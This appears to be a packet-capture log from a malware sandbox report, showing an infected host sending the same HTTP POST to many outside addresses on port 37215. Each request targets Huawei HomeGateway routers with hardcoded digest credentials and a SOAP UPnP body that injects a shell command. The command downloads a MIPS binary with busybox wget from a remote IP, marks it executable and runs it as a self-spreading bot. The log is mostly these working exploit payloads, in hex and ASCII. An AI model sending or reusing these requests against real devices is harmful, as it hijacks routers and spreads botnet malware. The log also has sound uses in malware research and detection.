                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        197192.168.2.2347408197.93.11.24537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312347889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        198192.168.2.2342172197.74.125.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312355995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        199192.168.2.2351900197.224.135.12237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312366962 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        200192.168.2.2356750157.175.234.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312375069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        201192.168.2.235030441.123.144.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312378883 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        202192.168.2.2358504197.185.200.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312381983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        203192.168.2.2341568172.203.211.2137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312386990 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        204192.168.2.2333320160.150.120.637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312478065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        205192.168.2.2358988157.82.197.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312478065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        206192.168.2.2345332197.185.234.20737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312485933 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
